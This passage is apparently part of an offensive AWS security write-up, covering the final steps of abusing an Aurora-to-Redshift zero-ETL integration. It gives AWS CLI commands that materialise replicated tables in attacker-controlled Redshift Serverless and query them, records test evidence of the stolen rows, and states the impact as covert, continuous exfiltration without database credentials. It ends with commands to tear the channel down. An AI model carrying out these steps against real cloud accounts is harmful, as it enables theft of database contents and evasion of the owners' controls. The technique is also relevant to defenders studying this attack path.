5) Materialize and query the replicated data in Redshift
```bash
# Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION)
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
--sql "select integration_id from svv_integration"
# take the GUID value
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
--sql "create database ztl_db from integration '<integration_id>' database postgres"

# List tables replicated
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \
--sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;"
```

Evidence (observed during testing):

  • redshift describe-inbound-integrations: Status ACTIVE for Integration arn:…377a462b-…
  • SVV_INTEGRATION shows integration_id 377a462b-c42c-4f08-937b-77fe75d98211, with state PendingDbConnectState before the database is created.
  • After CREATE DATABASE FROM INTEGRATION, listing the tables shows schema ztl and table customers; querying ztl.customers returns 2 rows (Alice, Bob).

Impact: Continuous, near-real-time exfiltration of selected Aurora PostgreSQL tables into attacker-controlled Redshift Serverless, without database credentials, backups or network access to the source cluster.
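
To tear the covert channel down afterwards, the integration and the Redshift Serverless resources created above can be removed; a hedged cleanup sketch using the names from the steps above:

```bash
# Remove the zero-ETL integration (look up its identifier first)
aws rds describe-integrations --region $REGION
aws rds delete-integration --region $REGION --integration-identifier <INTEGRATION_ID>

# Delete the Redshift Serverless workgroup and namespace created earlier
aws redshift-serverless delete-workgroup --region $REGION --workgroup-name ztl-wg
aws redshift-serverless delete-namespace --region $REGION --namespace-name ztl-ns
```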
